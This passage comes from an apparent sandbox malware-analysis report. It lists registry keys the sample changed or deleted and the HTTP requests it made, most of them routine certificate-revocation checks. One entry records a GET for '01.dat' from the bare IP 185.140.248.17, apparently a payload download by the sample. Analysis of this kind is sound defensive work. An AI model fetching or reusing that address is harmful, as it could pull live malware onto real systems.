- "HKEY_LOCAL_MACHINE\\Software\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\CurrentState",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\CurrentState\\DownloadTimeRemainingMs",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\CurrentState\\DownloadProgressPercent",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\CurrentState\\StateValue",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\BITS\\Performance\\PerfMMFileName",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\BackupRestore\\FilesNotToBackup\\BITS_LOG",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\BackupRestore\\FilesNotToBackup\\BITS_BAK"
- ]
- [*] Deleted Registry Keys: [
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\uid",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\old-uid",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\tttoken",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\UpdateAvailableCount",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{430FD4D0-B729-4F61-AA34-91526481799D}\\UpdateAvailableSince",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\dr",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Google\\Update\\ClientState\\{8A69D345-D564-463C-AFF1-A69D9E530F96}\\tttoken"
- ]
- [*] DNS Communications: []
- [*] Domains: []
- [*] Network Communication - ICMP: []
- [*] Network Communication - HTTP: [
- {
- "count": 1,
- "body": "",
- "uri": "http://185.140.248.17/01.dat",
- "user-agent": "",
- "method": "GET",
- "host": "185.140.248.17",
- "version": "1.1",
- "path": "/01.dat",
- "data": "GET /01.dat HTTP/1.1\r\nHost: 185.140.248.17\r\nCache-Control: no-cache\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D HTTP/1.1\r\nCache-Control: max-age = 128165\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 23 Mar 2019 11:02:13 GMT\r\nIf-None-Match: \"5c961235-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D HTTP/1.1\r\nCache-Control: max-age = 143038\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 23 Mar 2019 15:00:07 GMT\r\nIf-None-Match: \"5c9649f7-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEDoV9Mh%2FtNM5k9Pus79K5eQ%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.pki.goog",
- "version": "1.1",
- "path": "/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEDoV9Mh%2FtNM5k9Pus79K5eQ%3D",
- "data": "GET /GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEDoV9Mh%2FtNM5k9Pus79K5eQ%3D HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.pki.goog\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAi4elAbvpzaLRZNPjlRv1U%3D HTTP/1.1\r\nCache-Control: max-age = 89056\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Fri, 22 Mar 2019 18:30:24 GMT\r\nIf-None-Match: \"5c9529c0-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://crl.microsoft.com/pki/crl/products/MicrosoftTimeStampPCA.crl",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "crl.microsoft.com",
- "version": "1.1",
- "path": "/pki/crl/products/MicrosoftTimeStampPCA.crl",
- "data": "GET /pki/crl/products/MicrosoftTimeStampPCA.crl HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 16 Feb 2019 02:02:49 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: crl.microsoft.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEDaCXn%2B1pIGTfvbRc2u5PKY%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.comodoca.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEDaCXn%2B1pIGTfvbRc2u5PKY%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBReAhtobFzTvhaRmVeJ38QUchY9AwQUu69%2BAj36pvE8hI6t7jiY7NkyMtQCEDaCXn%2B1pIGTfvbRc2u5PKY%3D HTTP/1.1\r\nCache-Control: max-age = 94804\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Mon, 11 Mar 2019 04:19:13 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.comodoca.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEEpXWRnDaZSEY67E8B6coDU%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.pki.goog",
- "version": "1.1",
- "path": "/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEEpXWRnDaZSEY67E8B6coDU%3D",
- "data": "GET /GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEEpXWRnDaZSEY67E8B6coDU%3D HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.pki.goog\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAwVvkoVuwkDyQGx1sJlMC8%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAwVvkoVuwkDyQGx1sJlMC8%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAwVvkoVuwkDyQGx1sJlMC8%3D HTTP/1.1\r\nCache-Control: max-age = 108232\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Fri, 22 Mar 2019 23:50:01 GMT\r\nIf-None-Match: \"5c9574a9-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "www.download.windowsupdate.com",
- "version": "1.1",
- "path": "/msdownload/update/v3/static/trustedr/en/authrootstl.cab",
- "data": "GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Fri, 22 Feb 2019 16:53:13 GMT\r\nIf-None-Match: \"80e22c19cfcad41:0\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: www.download.windowsupdate.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://crl.microsoft.com/pki/crl/products/MicCodSigPCA_08-31-2010.crl",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "crl.microsoft.com",
- "version": "1.1",
- "path": "/pki/crl/products/MicCodSigPCA_08-31-2010.crl",
- "data": "GET /pki/crl/products/MicCodSigPCA_08-31-2010.crl HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Thu, 14 Feb 2019 06:01:18 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: crl.microsoft.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8sEMlbBsCTf7jUSfg%2BhWk%3D HTTP/1.1\r\nCache-Control: max-age = 93156\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 16 Mar 2019 04:40:45 GMT\r\nIf-None-Match: \"5c8c7e4d-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D HTTP/1.1\r\nCache-Control: max-age = 149079\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 23 Mar 2019 11:10:47 GMT\r\nIf-None-Match: \"5c961437-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAiIzVJfGSRETRSlgpHeuVI%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAiIzVJfGSRETRSlgpHeuVI%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAiIzVJfGSRETRSlgpHeuVI%3D HTTP/1.1\r\nCache-Control: max-age = 148251\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 16 Mar 2019 18:10:24 GMT\r\nIf-None-Match: \"5c8d3c10-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEH4PjD8bD0NfJXpoX0ln6s4%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.pki.goog",
- "version": "1.1",
- "path": "/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEH4PjD8bD0NfJXpoX0ln6s4%3D",
- "data": "GET /GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEH4PjD8bD0NfJXpoX0ln6s4%3D HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.pki.goog\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHQnb7Tt0tUhlRVnnq4nPN8%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.pki.goog",
- "version": "1.1",
- "path": "/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHQnb7Tt0tUhlRVnnq4nPN8%3D",
- "data": "GET /GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHQnb7Tt0tUhlRVnnq4nPN8%3D HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.pki.goog\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D HTTP/1.1\r\nCache-Control: max-age = 126990\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 23 Mar 2019 10:41:16 GMT\r\nIf-None-Match: \"5c960d4c-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.pki.goog/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHAHFVlJElKyLEMbtWWDIbo%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.pki.goog",
- "version": "1.1",
- "path": "/GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHAHFVlJElKyLEMbtWWDIbo%3D",
- "data": "GET /GTSGIAG3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT27bBjYjKBmjX2jXWgnQJKEapsrQQUd8K4UJpndnaxLcKG0IOgfqZ%2BuksCEHAHFVlJElKyLEMbtWWDIbo%3D HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.pki.goog\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.msocsp.com/MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPC1vZt9qvn7bzY3Iidtbhla4mKQQUWIif1tycSCK3FD7%2FhIjo5oX%2F%2Bn0CE3sAAGyvV14%2FmEPDgh0AAAAAbK8%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.msocsp.com",
- "version": "1.1",
- "path": "/MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPC1vZt9qvn7bzY3Iidtbhla4mKQQUWIif1tycSCK3FD7%2FhIjo5oX%2F%2Bn0CE3sAAGyvV14%2FmEPDgh0AAAAAbK8%3D",
- "data": "GET /MFQwUjBQME4wTDAJBgUrDgMCGgUABBRPC1vZt9qvn7bzY3Iidtbhla4mKQQUWIif1tycSCK3FD7%2FhIjo5oX%2F%2Bn0CE3sAAGyvV14%2FmEPDgh0AAAAAbK8%3D HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Sat, 23 Mar 2019 17:46:18 GMT\r\nIf-None-Match: \"dd54d75d4688b8dc62b087df4e04af258704c48b\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.msocsp.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.thawte.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD%2Fyl6nWPkczAQUe1tFz6%2FOy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS%2BzcBkvzl4%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.thawte.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD%2Fyl6nWPkczAQUe1tFz6%2FOy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS%2BzcBkvzl4%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQwF4prw9S7mCbCEHD%2Fyl6nWPkczAQUe1tFz6%2FOy3r9MZIaarbzRutXSFACEEeXTXhzpbyrDS%2BzcBkvzl4%3D HTTP/1.1\r\nCache-Control: max-age = 320712\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Wed, 20 Mar 2019 11:42:01 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.thawte.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.usertrust.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR8sWZUnKvbRO5iJhat9GV793rVlAQUrb2YejS0Jvf6xCZU7wO94CTLVBoCECdm7lbrSfOOq9dwovyE3iI%3D HTTP/1.1\r\nCache-Control: max-age = 94765\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Mon, 11 Mar 2019 04:19:13 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.usertrust.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://th.symcd.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9%2BWQCtWAQU1A1lP3q9NMb%2BR%2BdMDcC98t4Vq3ECEBT4%2FdFn%2BSQCsVcLXcSVyBU%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "th.symcd.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9%2BWQCtWAQU1A1lP3q9NMb%2BR%2BdMDcC98t4Vq3ECEBT4%2FdFn%2BSQCsVcLXcSVyBU%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRsif7263KedmR2MLuYKv9%2BWQCtWAQU1A1lP3q9NMb%2BR%2BdMDcC98t4Vq3ECEBT4%2FdFn%2BSQCsVcLXcSVyBU%3D HTTP/1.1\r\nCache-Control: max-age = 386377\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Thu, 21 Mar 2019 05:58:32 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: th.symcd.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAH9o%2BtuynXIiEOLckvPvJE%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAH9o%2BtuynXIiEOLckvPvJE%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAH9o%2BtuynXIiEOLckvPvJE%3D HTTP/1.1\r\nCache-Control: max-age = 142986\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 07:40:28 GMT\r\nIf-None-Match: \"5cece5ec-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- },
